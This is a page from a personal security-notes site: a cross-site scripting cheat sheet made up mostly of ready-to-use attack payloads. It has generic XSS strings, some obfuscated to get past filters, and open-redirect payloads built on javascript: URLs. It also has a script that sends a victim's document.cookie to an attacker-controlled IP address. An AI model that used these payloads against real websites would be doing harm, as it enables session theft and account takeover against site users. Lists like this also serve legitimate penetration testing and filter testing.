burmat / nathan burchfield
  • security and systems administration
  • security / hacking
    • Domain Enumeration + Exploitation
      • Command and Control
      • Credential Access
      • Defense Evasion
      • Discovery
      • Execution
      • Impact
      • Lateral Movement
      • Persistence
      • Privilege Escalation
    • Tools and Services
      • Adobe Experience Manager (AEM)
      • amass
      • ike-scan
      • jq
      • Shodan
      • smbmap
      • tmux
      • tshark
      • Voice Over IP (VoIP)
    • One-Liners and Dirty Scripts
    • MSFvenom Cheetsheet
    • Web Application Hacking
      • Cross-Site Scripting (XXS)
      • SQL Injection (SQLi)
    • OSCP / PWK - Random Tips and Tricks
  • systems administration
    • Active Directory Administration
    • Exchange Administration
    • System Fixes
    • Helper Commands
    • Log Parsing
    • SQL Server Administration
    • Windows Terminal Themes
Powered by GitBook
On this page
  • Generic Payloads
  • Sending a Cookie
  • Open Redirect to XSS payload list:
  1. security / hacking
  2. Web Application Hacking

Cross-Site Scripting (XXS)

PreviousWeb Application HackingNextSQL Injection (SQLi)

Last updated 7 months ago

Generic Payloads

  • <svg onload=alert%26%230000000040"1")>

  • <x/oncut=alert(1)>a

  • <body/onload=&lt;!--&gt;&#10alert(1)>

  • <--<img/src= onerror=alert(1)> --!>

  • "><img src=x onerror=prompt(1);>

  • --><script>alert('XSS PRESENT')</script>

  • ">script>alert(1)</script>

  • <script>alert(document.cookie)</script>

Sending a Cookie

<script>new Image().src="<http://10.11.0.68/pwnd.php?output=>"+document.cookie;</script>

Open Redirect to XSS payload list:

→ javascript:alert(1) → %09Jav%09ascript:alert(1) → javascript://%250Alert(1) → /%09/javascript:alert(1); → //%5cjavascript:alert(1); → <>javascript:alert(1); → //javascript:alert(1); → \\j\\av\\a\\s\\cr\\i\\pt\\:\\a\\l\\ert\\(1\\)

Credit:

https://twitter.com/beginnbounty/status/1555898799037743104?s=20&t=zGK3_NkYCyU1Xk_uIss46Q